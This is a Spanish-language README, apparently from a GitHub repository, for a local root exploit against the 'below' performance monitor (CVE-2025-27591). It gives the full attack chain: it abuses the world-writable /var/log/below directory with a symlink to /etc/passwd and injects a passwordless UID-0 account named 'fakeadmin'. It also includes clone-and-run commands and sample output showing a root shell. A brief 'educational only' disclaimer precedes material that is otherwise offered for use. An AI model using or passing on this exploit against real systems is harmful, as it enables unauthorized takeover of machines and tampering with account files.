
🔥 Exploit de escalada de privilegios local para CVE-2025-27591 | Abusa del directorio de logs con permisos de escritura mundial en Below para obtener root mediante inyección en /etc/passwd
below🛑 Aviso: Este exploit se proporciona solo con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado puede ser ilegal.
below es una herramienta de monitoreo de rendimiento desarrollada por Facebook para sistemas Linux. Las versiones de below anteriores a una versión parcheada se ven afectadas por una vulnerabilidad crítica que permite a usuarios sin privilegios escalar a root explotando directorios de registros con permisos de escritura mundial y un manejo no saneado de registros.
Este script Bash realiza lo siguiente:
Verificar el directorio con permisos de escritura mundial:
/var/log/below tiene permisos de escritura mundial (una señal de alarma).Preparar el ataque de enlace simbólico:
error_root.log existente (si lo hay) y crea un enlace simbólico a /etc/passwd.Construcción del payload:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
Desencadenar el registro:
sudo below record para forzar al binario vulnerable a escribir registros.Obtener acceso root:
su fakeadmin para obtener un shell root sin solicitud de contraseña.CVE-2025-27591/
├── exploit.sh
├── README.md
Antes de ejecutar el exploit, asegúrate de tener lo siguiente:
/usr/bin/below/var/log/belowsudo para ejecutar: sudo below recordln (para crear enlaces simbólicos)su (para cambiar de usuario)timeout (para controlar el tiempo de ejecución)whoami (para verificar privilegios)# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Make the script executable
chmod +x exploit.sh
# 3. Execute the exploit
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
| Campo | Valor |
|---|
| CVE-ID | CVE-2025-27591 |
| Severidad | 🔥 Crítica (CVSS ≈ 7.8 - 8.8) |
| Vector de ataque | Local |
| Impacto | Escalada de privilegios a root (UID=0) |
| Tipo de Exploit | Abuso de enlace simbólico / Inyección de archivos de registro |
| Aplicación afectada | below – típicamente instalado como /usr/bin/below |
| Causa raíz | Escrituras no seguras de archivos en /var/log/below/ sin comprobaciones de permisos |